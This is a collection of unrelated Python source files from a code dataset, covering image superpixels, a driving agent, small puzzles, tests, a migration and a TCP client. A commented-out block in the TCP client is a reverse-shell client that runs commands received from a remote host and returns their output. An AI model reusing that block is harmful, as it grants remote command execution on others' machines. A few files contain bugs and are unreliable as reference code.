Disc.UPPER, 60.0)\n self.turn_disc(Direction.LEFT, Disc.UPPER)\n self.rotate_disc(Direction.LEFT, Disc.UPPER, 60.0)\n\n self.gameMoves += 6\n\n self.gameActive = True\n\n def color_blocks(self):\n for i in range(0, 64):\n Blocks.blocks[i].col = random.randrange(0, 7)\n","repo_name":"adiuvaris/EnigmaGame","sub_path":"src/EnigmaGame/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":10032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20732643027","text":"# from skimage.filters import sobel\nfrom skimage.segmentation import slic, mark_boundaries\nimport cv2 #much faster image loading than skimage\nimport numpy as np\nimport glob\n# import sys\nimport pandas as pd\nfrom tqdm import tqdm\nimport subprocess\nfrom argparse import ArgumentParser\n\n\n# Threshold for deciding if the label of a superpixel should be 0 or 1\n# Currently if 2% or more of the superpixel has a mask, it is labelled true\nTHRESHOLD = 0.02\n\n# Pretty optimal values. Found using trial-and-error\nSEGMENTS = 200\nCOMPACTNESS = 35\n\ndef crop_img(img):\n im = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n mask = im>0\n return img[np.ix_(mask.any(1),mask.any(0))]\n\ndef save_patches(sp_list,labels,counter,csv=[],p_sav=''):\n for j in range(len(sp_list)):\n cv2.imwrite(p_sav+'train/Patch_'+str(counter)+'.png',sp_list[j])\n csv.append([p_sav+'train/Patch_'+str(counter),labels[counter]])\n counter+=1\n csv_df = pd.DataFrame(np.array(csv))\n csv_df.to_csv('Labels.csv')\n return counter,csv\n\ndef main(): \n parser = ArgumentParser(\n description=\"Script for generating superpixel training masks, from actual masks.\"\n \" Also outputs cropped superpixels extracted from images and their labels.\")\n parser.add_argument('-i','--image_path',help='Path to directory with images', required=True)\n parser.add_argument('-m','--mask_path',help='Path to directory with masks', required=True)\n parser.add_argument('-b','--band_path',help='Path to directory to save new bands', required=True)\n parser.add_argument('-p','--patch_path',help='Path to directory to save patches', required=True)\n parser.add_argument('-c','--counter',help='Initial value of counter. Use if save path already has patches saved', required=False, default=0)\n parser.add_srgument('-s','--shutdown',help='Shutdown VM after script execution completes', required=False, default=None)\n args = parser.parse_args()\n \n im = args.image_path\n msk = args.mask_path\n b_sav = args.band_path\n p_sav = args.patch_path\n\n im_addr = sorted(glob.glob(im+\"/*\"))\n msk_addr = sorted(glob.glob(msk+\"/*\"))\n\n sp_list = []\n labels = []\n csv = []\n counter = args.counter\n if(counter>0):\n df = pd.read_csv('Labels.csv')\n csv = list(df.itertuples(index=False))\n \n for i in tqdm(range(len(im_addr))):\n im = cv2.imread(im_addr[i])\n\n mask = cv2.imread(msk_addr[i])\n mask = cv2.cvtColor(mask, cv2.COLOR_BGR2GRAY)\n\n # Returns 2D array with same size as image.\n # Each pixel has an integer value denoting which\n # superpixel it belongs to.\n seg = slic(im, n_segments=SEGMENTS, compactness=COMPACTNESS)\n\n new_band = np.zeros_like(im[:,:,0])\n for sp_index in range(np.max(seg)+1):\n # Get the rows and column of the pixels in current spixel\n rows,cols = np.where(seg==sp_index) \n # Number of pixels in current spixel\n num_pixels = rows.shape[0] \n super_pixel = np.zeros_like(im)\n mask_segment = np.zeros_like(im[:,:,0])\n \n # Generate cropped spixel\n super_pixel[rows,cols,:] += im[rows,cols,:] \n super_pixel = crop_img(super_pixel)\n super_pixel = cv2.resize(super_pixel,(128,128),cv2.INTER_AREA)\n\n # Extract portion of mask\n mask_segment[rows,cols] += mask[rows,cols]\n\n # Calculate label\n num_true = np.sum(mask_segment)/255\n fraction_true = float(num_true)/num_pixels\n label = 1 if fraction_true>THRESHOLD else 0\n \n sp_list.append(super_pixel)\n labels.append(label)\n\n # Calculate the new band\n if(label==1):\n new_band[rows,cols] += 255\n\n # Save the new band\n cv2.imwrite(b_sav+'/Band4_'+(im_addr[i].split('/')[-1])[:-5]+'.png',new_band)\n\n # Save patches every 50 images processed\n # Delete patches from memory after saving\n if(i%50 == 49):\n counter,csv = save_patches(sp_list,labels,counter,csv,p_sav) \n sp_list = []\n\n save_patches(sp_list,labels,counter,csv)\n if args.shutdown:\n subprocess.call(['shutdown', '-h', 'now'])\n \nif __name__ == '__main__':\n main()\n\n\n\n\n\n\n","repo_name":"ZQH-sail/Superpixel_Extraction","sub_path":"SuperpixelTrain.py","file_name":"SuperpixelTrain.py","file_ext":"py","file_size_in_byte":4332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12112936232","text":"import random\nfrom dataclasses import dataclass\nfrom typing import Sequence\nimport numpy as np\nfrom typing import Optional\n\nfrom commonroad.scenario.lanelet import LaneletNetwork\nfrom dg_commons import PlayerName\nfrom dg_commons.sim.goals import PlanningGoal\nfrom dg_commons.sim import SimObservations, InitSimObservations\nfrom dg_commons.sim.agents import Agent\nfrom dg_commons.sim.models.obstacles import StaticObstacle\nfrom dg_commons.sim.models.vehicle import VehicleCommands\nfrom dg_commons.sim.models.vehicle_structures import VehicleGeometry\nfrom dg_commons.sim.models.vehicle_utils import VehicleParameters\n# controller\nfrom dg_commons.controllers.speed import SpeedBehavior, SpeedController\nfrom dg_commons.controllers.steer import SteerController\nfrom dg_commons.controllers.pid import PIDParam\n# import rrt\nfrom pdm4ar.exercises.ex08.rrt import RRT\nfrom geometry import SE2value, angle_from_SE2, translation_angle_from_SE2\nfrom dg_commons.geo import SE2_apply_T2\nfrom geometry import SE2_from_xytheta, SE2value, translation_from_SE2\n#from dg_commons.maps import DgLanelet\n#from dg_commons.controllers.pure_pursuit import PurePursuit, PurePursuitParam\n\n\nclass PurePursuitController:\n \"\"\" PurePursuit Controller\n Returns: delta_ref \"\"\"\n def __init__(self, waypoints, lookahead, goal):\n self.waypoints = waypoints\n self.current_waypoint_idx = 0\n self.lookahead = lookahead\n self.index = None\n self.goal = goal\n self.lookead_minmax = (3,8)\n \n \n def find_goal_point(self, pos):\n lookahead = self.lookahead\n #print(\"lookahead\", lookahead)\n min_dist = float('inf')\n closest_waypoint_idx = None\n for i, waypoint in enumerate(self.waypoints):\n dist = np.linalg.norm(np.array(waypoint) - np.array(pos))\n if dist < min_dist:\n min_dist = dist\n closest_waypoint_idx = i\n \n goal_point = self.goal\n for i in range(closest_waypoint_idx, len(self.waypoints)):\n waypoint = self.waypoints[i]\n self.index = i\n dist = np.linalg.norm(np.array(waypoint) - np.array(pos))\n if dist > lookahead:\n goal_point = waypoint\n break\n \n return goal_point\n \n \n def get_steering_angle(self, pos, pose, psi_ref):\n \"\"\"\n :return: float the desired wheel angle\n \"\"\"\n goal_point = self.find_goal_point(pos=pos)\n theta = angle_from_SE2(pose)\n rear_axle = SE2_apply_T2(pose, np.array([-1.2, 0]))\n # transform goal point to SE2 value\n if goal_point is not None:\n goal_point = SE2_from_xytheta([goal_point[0], goal_point[1], psi_ref[self.index-1]])\n #print(\"psi_ref of goal point\", psi_ref[self.index-1])\n angle = psi_ref[self.index-1]\n p_goal, theta_goal = translation_angle_from_SE2(goal_point)\n alpha = np.arctan2(p_goal[1] - rear_axle[1], p_goal[0] - rear_axle[0]) - theta\n radius = self.lookahead / (2 * np.sin(alpha))\n delta_ref = np.arctan(3.5 / radius)\n delta_ref = np.clip(delta_ref, -1, 1)\n return delta_ref, angle\n\nclass Pdm4arAgent(Agent):\n \"\"\"This is the PDM4AR agent.\n Do *NOT* modify the naming of the existing methods and the input/output types.\n Feel free to add additional methods, objects and functions that help you to solve the task\"\"\"\n\n def __init__(self,\n sg: VehicleGeometry,\n sp: VehicleParameters\n ):\n self.sg = sg\n self.sp = sp\n self.name: PlayerName = None\n self.goal: PlanningGoal = None\n self.lanelet_network: LaneletNetwork = None\n self.static_obstacles: Sequence[StaticObstacle] = None\n # controller\n self.speed_controller = SpeedController.from_vehicle_params(model_param=self.sp) # initialize PID controller for speed\n self.speed_behavior: Optional[SpeedBehavior] = None # reference speed\n self.steer_controller = SteerController.from_vehicle_params(vehicle_param=self.sp)\n self.PID_params = PIDParam\n self.PID_params.kP = 1.3 #1.4?\n self.PID_params.kI = 0\n self.PID_params.kD = 1.7\n self.PID_params.setpoint_minmax = (-1.0,1.0)\n self.PID_params.output_minmax = (-0.5,0.5)\n self.steer_controller.params = self.PID_params\n self.lookahead = 3.2\n self.slow_down = 0.8\n #self.pure_pursuit: PurePursuit = PurePursuit.from_model_geometry(self.sg)\n #self.pure_pursuit_params = PurePursuitParam\n #self.pure_pursuit_params.look_ahead_minmax = (3,4)\n #self.pure_pursuit.param = self.pure_pursuit_params\n\n \n def on_episode_init(self, init_obs: InitSimObservations):\n \"\"\"This method is called by the simulator at the beginning of each episode.\"\"\"\n self.name = init_obs.my_name\n self.goal = init_obs.goal\n self.lanelet_network = init_obs.dg_scenario.lanelet_network\n self.static_obstacles = list(init_obs.dg_scenario.static_obstacles.values())\n # controller\n self.speed_behavior: SpeedBehavior = SpeedBehavior()\n self.speed_behavior.my_name = self.name\n self.pure_pursuit = None\n\n # RRT\n self.graph = None\n self.path = None\n self.success = False\n self.smoothed_path = None\n self.delta_ref = 0\n self.psi_ref = None\n\n # Multi-player\n\n\n \n def get_commands(self, sim_obs: SimObservations) -> VehicleCommands:\n \"\"\" This method is called by the simulator at each time step.\n For instance, this is how you can get your current state from the observations:\n my_current_state: VehicleState = sim_obs.players[self.name].state\n\n :param sim_obs:\n :return:\n \"\"\"\n \n \"\"\" Vehicle params\"\"\"\n # Position\n agent = sim_obs.players[self.name]\n x = agent.state.x\n y = agent.state.y\n pos = (x,y)\n polygon = self.goal.goal\n end_pos_s = polygon.centroid # shapely point\n end_pos = (end_pos_s.x, end_pos_s.y) # convert to tuple\n # Orientation\n psi = agent.state.psi\n # Time\n t = float(sim_obs.time)\n # Static obstacles\n obstacles = self.static_obstacles\n \n \"\"\" Trajectory \"\"\"\n # RRT graph\n RRT_ = RRT(startpos=pos, endpos=end_pos, obstacles=obstacles, lanelet_network = self.lanelet_network, buffer=2.5)\n while self.success is False:\n #print(\"buffersize\", RRT_.buffer)\n self.graph, self.success = RRT_.generate_RRT()\n if self.success is False:\n RRT_.buffer -= 0.3\n\n #print(\"self.success\", self.success)\n \n # Path from start to goal as list\n if self.success:\n self.path = RRT_.dijkstra(self.graph)\n self.smoothed_path = RRT_.smooth_path(self.path)\n #RRT_.plot(self.graph, path = self.smoothed_path)\n #else:\n #print(\"no path to goal found by RRT\") \n \n \"\"\" Multi-player \"\"\"\n #print(sim_obs.players[self.name].occupancy)\n\n\n \"\"\" Steer controller \"\"\"\n self._my_obs = sim_obs.players[self.name].state\n my_pose: SE2value = SE2_from_xytheta([self._my_obs.x, self._my_obs.y, self._my_obs.psi])\n \n if self.psi_ref == None:\n self.psi_ref = []\n for i in range(1,len(self.smoothed_path)):\n delta_x = self.smoothed_path[i][0] - self.smoothed_path[i-1][0]\n delta_y = self.smoothed_path[i][1] - self.smoothed_path[i-1][1]\n self.psi_ref.append(np.arctan2(delta_y, delta_x)) \n \n if self.pure_pursuit == None:\n self.pure_pursuit = PurePursuitController(self.smoothed_path, self.lookahead, end_pos)\n self.delta_ref, angle = self.pure_pursuit.get_steering_angle(pos, my_pose, self.psi_ref)\n\n # track delta_ref with PID controller\n self.steer_controller.update_measurement(measurement=self._my_obs.delta)\n self.steer_controller.update_reference(self.delta_ref)\n ddelta = self.steer_controller.get_control(t) \n\n \n \"\"\" Speed controller \"\"\"\n self.speed_behavior.update_observations(sim_obs.players)\n self.speed_controller.update_measurement(measurement=agent.state.vx)\n\n\n speed_ref, emergency = self.speed_behavior.get_speed_ref(t)\n if emergency:\n # Once the emergency kicks in the speed ref will always be 0\n self._emergency = True\n #print(\"emergency\")\n speed_ref = 0.1\n\n #print(\"cruise control\", self.speed_behavior.cruise_control(my_pose)) # relative pose = pose?\n if agent.state.vx > 8.5:\n speed_ref = 8.5\n # break before curves\n if abs(angle-psi) > 0.28:\n #print(\"break\")\n speed_ref = 4.0\n\n self.speed_controller.update_reference(reference=speed_ref)\n acc = self.speed_controller.get_control(t) * self.slow_down\n\n return VehicleCommands(acc=acc, ddelta=ddelta)\n","repo_name":"mr-d-self-driving/Path-Planning-and-Decision-Making-ETH-2022","sub_path":"ex08/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":9233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35734496039","text":"def is_palindrome(w):\n m = len(w)//2\n for i in range(0,m):\n if w[i] != w[i+m]:\n return False\n return True\n\nw = input()\nn = len(w)\nc = 0\nfor i in range(n):\n for j in range(i,n):\n if is_palindrome(w[i:j+1]):\n c += 1\nif c%2 == 1:\n print(\"Odd.\")\nelse:\n print(\"Or not.\")\n","repo_name":"lozaeric/icpc_undav","sub_path":"RPC/2018/12/palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"8167217332","text":"num = 2.5432\r\n\r\n\r\ndef findFraction01(num, error=0.000000000000001):\r\n LF = (0, 1)\r\n HF = (1, 1)\r\n iter = 0\r\n\r\n if num == 1:\r\n return HF\r\n if num == 0:\r\n return LF\r\n\r\n while True:\r\n MF = (LF[0]+HF[0], LF[1]+HF[1])\r\n\r\n M = MF[0]/MF[1]\r\n L = LF[0]/LF[1]\r\n H = HF[0]/HF[1]\r\n\r\n iter += 1\r\n if(M < num-error):\r\n LF = MF\r\n continue\r\n if(M > num+error):\r\n HF = MF\r\n continue\r\n\r\n print(\"tollerance:\", abs(num-M))\r\n print(\"iterations:\", iter)\r\n return MF\r\n\r\n\r\ndef findFraction(num):\r\n integer = int(num)\r\n fractional = num-integer\r\n\r\n frac = findFraction01(fractional)\r\n\r\n total = (frac[0]+integer*frac[1], frac[1])\r\n return total\r\n\r\n\r\nfrac = findFraction(num)\r\n\r\nprint(frac)\r\n","repo_name":"ManuelLerchner/Random-Coding-Projects","sub_path":"Python/fractionsTest/fractionsTest.py","file_name":"fractionsTest.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26593453624","text":"import socket\r\nimport argparse\r\nfrom cryptography.fernet import Fernet\r\n\r\ndescripcion = \"\"\" Instrucciones de uso:\r\nclient.py -msj (mensaje que desea enviar).\"\"\"\r\n\r\nparser = argparse.ArgumentParser(description='Escaneo de puertos',\r\n epilog=descripcion)\r\n\r\nparser.add_argument(\"-msj\", metavar='MSJ', dest=\"msj\", \r\n help=\"mensaje que desea enviar\", required=True)\r\nparams = parser.parse_args()\r\n\r\n# Cifrado\r\nclave = Fernet.generate_key()\r\ncipher_suite = Fernet(clave)\r\n\r\n# Guardar clave\r\nfile = open('clave.key', 'ab') # b es para guardar en bytes\r\nfile.write(clave)\r\nfile.close()\r\n\r\n# Tomar argumento y convertirlo a bytes.\r\nmensaje = params.msj\r\nmensaje_bytes = mensaje.encode()\r\n\r\n# Ciframos el mensaje.\r\n# Ciframos el mensaje que convertirmos en bytes.\r\nmsj_cifrado = cipher_suite.encrypt(mensaje_bytes)\r\nprint(\"Mensaje a enviar: \", msj_cifrado)\r\n\r\n# Conectarse con el servidor TCP:\r\nTCP_IP = '127.0.0.1'\r\nTCP_PORT = 5005\r\nBUFFER_SIZE = 2048\r\n\r\n# Establecer la conexión:\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((TCP_IP, TCP_PORT))\r\ns.send(msj_cifrado) # Se manda el mensaje cifrado.\r\nrespuesta = s.recv(BUFFER_SIZE).decode()\r\ns.close()\r\n\r\nprint(\"Respuesta recibida: \", respuesta)\r\n\r\n\r\n'''\r\nHOST = \"192.168.100.7\"\r\nPORT = 4444\r\nSIZE = 1024\r\n\r\n# create the socket object\r\ns = socket.socket()\r\n# connect to the server\r\ns.connect((HOST, PORT))\r\n\r\n# receive the greeting message\r\nmessage = s.recv(SIZE).decode()\r\nprint(\"Server:\", message)\r\n\r\nwhile True:\r\n # receive the command from the server\r\n command = s.recv(SIZE).decode()\r\n if command.lower() == \"exit\":\r\n # if the command is exit, just break out of the loop\r\n break\r\n # execute the command and retrieve the results\r\n output = subprocess.getoutput(command)\r\n # send the results back to the server\r\n s.send(output.encode())\r\n# close client connection\r\ns.close()\r\n'''","repo_name":"MRX-official/PC","sub_path":"E9/clienteTCP.py","file_name":"clienteTCP.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38778666822","text":"\"\"\"User statistics tracking\n\nRevision ID: 3a87adc2088b\nRevises: 7de7ec98049b\nCreate Date: 2020-04-13 22:11:20.064789\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = \"3a87adc2088b\"\ndown_revision = \"7de7ec98049b\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table(\n \"user_statistic\",\n sa.Column(\"date\", sa.Date(), nullable=False),\n sa.Column(\"callback_calls\", sa.Integer(), nullable=False),\n sa.Column(\"poll_callback_calls\", sa.Integer(), nullable=False),\n sa.Column(\"created_polls\", sa.Integer(), nullable=False),\n sa.Column(\"inline_shares\", sa.Integer(), nullable=False),\n sa.Column(\"user_id\", sa.BigInteger(), nullable=False),\n sa.ForeignKeyConstraint(\n [\"user_id\"], [\"user.id\"], name=\"user\", ondelete=\"cascade\"\n ),\n sa.PrimaryKeyConstraint(\"date\", \"user_id\"),\n )\n op.create_index(\n op.f(\"ix_user_statistic_user_id\"), \"user_statistic\", [\"user_id\"], unique=False\n )\n\n op.alter_column(\n \"update\",\n \"count\",\n existing_type=sa.INTEGER(),\n server_default=None,\n existing_nullable=False,\n )\n op.add_column(\n \"user\",\n sa.Column(\"banned\", sa.Boolean(), server_default=\"FALSE\", nullable=False),\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column(\"user\", \"banned\")\n op.alter_column(\n \"update\",\n \"count\",\n existing_type=sa.INTEGER(),\n server_default=sa.text(\"0\"),\n existing_nullable=False,\n )\n op.drop_index(op.f(\"ix_user_statistic_user_id\"), table_name=\"user_statistic\")\n op.drop_table(\"user_statistic\")\n # ### end Alembic commands ###\n","repo_name":"Nukesor/ultimate-poll-bot","sub_path":"migrations/versions/2020_04_13_3a87adc2088b_user_statistics_tracking.py","file_name":"2020_04_13_3a87adc2088b_user_statistics_tracking.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","stars":133,"dataset":"github-code","pt":"3"} +{"seq_id":"21316337982","text":"from .utils import get_filters, get_values, get_relations, set_values, set_relations\n\n\ndef default_resolve(schema, model, data, **kwargs):\n filters = get_filters(schema, data)\n return model.objects.filter(**filters)\n\n\ndef default_execute(schema, data, raw_data, **kwargs):\n values = get_values(schema, raw_data)\n relations = get_relations(schema, raw_data)\n\n for model in data:\n set_values(model, values)\n set_relations(model, relations)\n model.save()\n return data\n","repo_name":"LonguCodes/DGF","sub_path":"DGF/resolvers/change.py","file_name":"change.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"18251010511","text":"import os\nimport shutil\nimport tempfile\nimport unittest\n\nimport pytest\nimport yaml\n\nfrom tbc.tbclib.config_parser import *\n\n\n# file fixture\n# https://docs.pytest.org/en/6.2.x/tmpdir.html\n# https://docs.pytest.org/en/6.2.x/tmpdir.html#the-tmpdir-factory-fixture\n# https://rinatz.github.io/python-book/ch08-02-pytest/\n# https://www.m3tech.blog/entry/pytest-summary\n# -------------------------------\n# Arrange-Act-Assert Style\n# http://wiki.c2.com/?ArrangeActAssert\n\n\ncfg_name = \".tbcconfig.yml\"\n\n# =============================\n# CfgParser\n# ----------\n# See: yapf/yapftests/file_resources_test.py\n# https://github.com/google/yapf/blob/main/yapftests/file_resources_test.py\n# =============================\n\n_correct_cfg_obj = {\n \"version\": \"1\",\n \"twitter\": {\n \"consumer_key\": \"CONSUMER_KEY\",\n \"consumer_secret\": \"CONSUMER_SECRET\",\n \"access_token\": \"ACCESS_TOKEN\",\n \"access_secret\": \"ACCESS_SECRET\"\n },\n \"source\": {\n \"type\": \"local\",\n \"local_path\": \"src/data/tweets-tbl.csv\",\n \"gcs_path\": \"path/to/cloud/storage/table.csv\",\n \"gspread_path\": \"path/to/spreadsheet/table\",\n }\n}\n\n_no_twtoken_cfg_obj = {\n \"version\": \"1\",\n \"twitter\": {\n \"consumer_key\": \"\",\n \"consumer_secret\": \"\",\n \"access_token\": \"\",\n \"access_secret\": \"\"\n },\n \"source\": {\n \"type\": \"local\",\n \"local_path\": \"src/data/tweets-tbl.csv\",\n \"gcs_path\": \"path/to/cloud/storage/table.csv\",\n \"gspread_path\": \"path/to/spreadsheet/table\",\n }\n}\n\n@pytest.fixture\ndef cfg_file_no_twtoken(tmpdir):\n cfg_tmpfile = tmpdir.join(cfg_name)\n with cfg_tmpfile.open('w') as f:\n cfg_str = yaml.dump(_no_twtoken_cfg_obj)\n f.write(cfg_str)\n yield str(cfg_tmpfile)\n cfg_tmpfile.remove()\n\n@pytest.fixture\ndef cfg_file_correct(tmpdir):\n cfg_tmpfile = tmpdir.join(cfg_name)\n with cfg_tmpfile.open('w') as f:\n cfg_str = yaml.dump(_correct_cfg_obj)\n f.write(cfg_str)\n yield str(cfg_tmpfile)\n cfg_tmpfile.remove()\n\n\ndef test_correct_cfg(cfg_file_correct):\n # Act\n cfg: TbcConfig = CfgParser.load(cfg_file_correct)\n\n # Assert\n assert cfg.ver == _correct_cfg_obj[\"version\"]\n assert cfg.tw_consumer_key == _correct_cfg_obj[\"twitter\"][\"consumer_key\"]\n assert cfg.tw_consumer_secret == _correct_cfg_obj[\"twitter\"][\"consumer_secret\"]\n assert cfg.tw_access_token == _correct_cfg_obj[\"twitter\"][\"access_token\"]\n assert cfg.tw_access_secret == _correct_cfg_obj[\"twitter\"][\"access_secret\"]\n assert cfg.src_type == 0 # SrcType.local.value\n assert cfg.src_lo_path == _correct_cfg_obj[\"source\"][\"local_path\"]\n assert cfg.src_gcs_path == _correct_cfg_obj[\"source\"][\"gcs_path\"]\n assert cfg.src_gspr_path == _correct_cfg_obj[\"source\"][\"gspread_path\"]\n assert cfg.twitter_tokens_exist() is True\n\n\ndef test_no_twtoken_cfg(cfg_file_no_twtoken):\n # Act\n cfg: TbcConfig = CfgParser.load(cfg_file_no_twtoken)\n\n # Assert\n assert cfg.twitter_tokens_exist() is False\n\n\n# =============================\n# TbcConfig\n# =============================\ndef test_tbccfg_empty():\n # Arrange / Act\n cfg = TbcConfig()\n\n # Assert\n assert cfg.twitter_tokens_exist() is False\n\ndef test_tbccfg_partial_empty():\n # Arrange / Act\n cfg = TbcConfig()\n cfg.tw_consumer_key = \"consumer_key\"\n\n # Assert\n assert cfg.twitter_tokens_exist() is False\n\ndef test_tbccfg_fulfilled():\n # Arrange\n cfg = TbcConfig()\n\n # Act\n cfg.tw_consumer_key = \"consumer_key\"\n cfg.tw_consumer_secret = \"consumer_secret\"\n cfg.tw_access_token = \"access_token\"\n cfg.tw_access_secret = \"access_secret\"\n\n # Assert\n assert cfg.twitter_tokens_exist() is True\n\n","repo_name":"sota0121/twitter-bot-cli","sub_path":"tests/test_config_parser.py","file_name":"test_config_parser.py","file_ext":"py","file_size_in_byte":3706,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"22217590364","text":"import MySQLdb\nimport sys\n\nfrom credentials import DATABASE_NAME, DATABASE_USER, DATABASE_PASSWORD, DATABASE_HOST\n\n\ndef get_score(score_list, value):\n if not value:\n return 0\n value = float(value)\n for x in score_list:\n if value > x[1]:\n return x[0]\n return 0\n\n\nENERGY_SCORES = [[10, 3350], [9, 3015], [8, 2680], [7, 2345], [6, 2010], [5, 1675], [4, 1340], [3, 1005], [2, 670], [1, 335]]\nSUGAR_SCORES = [[10, 45], [9, 40], [8, 36], [7, 31], [6, 27], [5, 22.5], [4, 18], [3, 13.5], [2, 9], [1, 4.5]]\nSATURATED_FAT_SCORE = [[10, 10], [9, 9], [8, 8], [7, 7], [6, 6], [5, 5], [4, 4], [3, 3], [2, 2], [1, 1]]\nSODIUM_SCORES = [[10, 900], [9, 810], [8, 720], [7, 630], [6, 540], [5, 450], [4, 360], [3, 270], [2, 180], [1, 90]]\nVEGETABLES_SCORE = [[-5, 0.8], [-2, 0.6], [-1, 0.4]]\nFIBRE_SCORES = [[-5, 4.7], [-4, 3.7], [-3, 2.8], [-2, 1.9], [-1, 0.9]]\nPROTEIN_SCORES = [[-5, 8.0], [-4, 6.4], [-3, 4.8], [-2, 3.2], [-1, 1.6]]\n\nconn = MySQLdb.connect(db=DATABASE_NAME, user=DATABASE_USER, passwd=DATABASE_PASSWORD, host=DATABASE_HOST, charset='utf8', use_unicode=True)\nif conn is None:\n sys.exit('Database connection could not be established!')\ncursor = conn.cursor(MySQLdb.cursors.DictCursor)\n\ncursor.execute(\"SELECT * FROM recipes WHERE nutri_score IS NULL\")\nrecipes = cursor.fetchall()\nfor r in recipes:\n a = get_score(ENERGY_SCORES, r['energy'])\n b = get_score(SUGAR_SCORES, r['sugar'])\n c = get_score(SATURATED_FAT_SCORE, r['saturated_fat'])\n d = get_score(SODIUM_SCORES, r['sodium'])\n e = get_score(VEGETABLES_SCORE, r['vegetables_fruits'])\n f = get_score(FIBRE_SCORES, r['fibre'])\n g = get_score(PROTEIN_SCORES, r['protein'])\n\n score = 0\n plus_points = a + b + c + d\n if plus_points >= 11 and e > -5:\n score = plus_points + e + f\n else:\n score = plus_points + e + f + g\n\n score_label = ''\n if score <= -1:\n score_label = 'A'\n elif score <= 2:\n score_label = 'B'\n elif score <= 10:\n score_label = 'C'\n elif score <= 18:\n score_label = 'D'\n else:\n score_label = 'E'\n\n print('RECIPE: ', r['title'], ': ', score, '-', score_label, ' (', a, ',', b, ',', c, ',', d, ',', e, ',', f, ',', g, ')')\n\n sql = \"UPDATE recipes SET nutri_score=%s, nutri_score_label=%s WHERE id=%s\"\n values = (score, score_label, r['id'])\n cursor.execute(sql, values)\n conn.commit()\n\nconn.close()\n","repo_name":"silvia-ivanova-github-rep/distant-reading-taste","sub_path":"DistantReadingTaste/Scripts/set_recipe_nutriscore.py","file_name":"set_recipe_nutriscore.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17129796827","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n@author: Kazem Gheysari\r\n\r\n\"\"\"\r\n\r\nfrom fractions import Fraction\r\n\r\ndef a_iter():\r\n \"\"\"\r\n In this generator, we use the Miller's algorithm for finding the N-th value of the relation. \r\n The original recurrence relation in unstable but reverse relation in stable , or \r\n Using the same recurrence relation to go backwards, from high orders to low orders, is stable. \r\n\r\n Parameters\r\n ----------\r\n No input parameter\r\n\r\n Returns\r\n -------\r\n y : float\r\n The n-th value of the sequence\r\n \r\n Example\r\n -----\r\n y = round(list(islice(a_iter(), 100))[-1], 5)\r\n \r\n \"\"\" \r\n an_1 = Fraction(2)\r\n an = Fraction(-4)\r\n \r\n while(True): \r\n an_1, an = an, Fraction(111-(1130/an)+(3000/(an_1*an)))\r\n # print(float(an)) \r\n yield float(an) \r\n \r\n\r\n\r\n\r\nif __name__ == '__main__': \r\n from itertools import islice\r\n for n in [3, 4, 5, 6, 7, 8, 20, 30, 50, 100]:\r\n print(\"{:4d} ---> {}\".format(n, list(islice(a_iter(), n))[-1]))\r\n \r\n y = round(list(islice(a_iter(), 100))[-1], 5)\r\n\r\n print(y)\r\n \r\n ","repo_name":"PymatFlow/Muller-sequence","sub_path":"4.Generator/code_generator.py","file_name":"code_generator.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7501757062","text":"#!/usr/bin/env python\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndf = pd.read_table(\"/Users/cmdb/qbb2015/stringtie/SRR072893/t_data.ctab\")\nroi = df['FPKM'] >0\n\nplot=df[roi]['FPKM']\nlog=np.log(plot)\n\nplt.figure()\nplt.hist(log.values)\nplt.xlabel('log of FPKM')\nplt.ylabel('Frequency')\nplt.title('Frequency of FPKM')\nplt.savefig(\"fpkm.png\")\n\n\n\n","repo_name":"jkirshner/qbb2015-homework","sub_path":"day3/histogram.day3.py","file_name":"histogram.day3.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42045965029","text":"#!/usr/bin/env python\nimport RPi.GPIO as GPIO\nimport sys\nimport time\n\nclass Led:\n def __init__(self, output_pin:int):\n self._output_pin = output_pin\n self.is_on = False\n self._setup()\n\n def _setup(self):\n GPIO.setup(self._output_pin, GPIO.OUT, initial= GPIO.LOW)\n\n def start_blink(self, value):\n while True:\n self.turn_on()\n time.sleep(0.5)\n self.turn_off()\n time.sleep(0.5)\n\n def stop_blink(self):\n self.turn_off()\n\n def turn_on(self):\n GPIO.output(self._output_pin, GPIO.HIGH)\n\n def turn_off(self):\n GPIO.output(self._output_pin, GPIO.LOW)\n\n\nif __name__ == \"__main__\":\n try:\n GPIO.setmode(GPIO.BOARD)\n Led_obj = Led(11)\n Led_obj.start_blink()\n except KeyboardInterrupt:\n GPIO.cleanup()\n 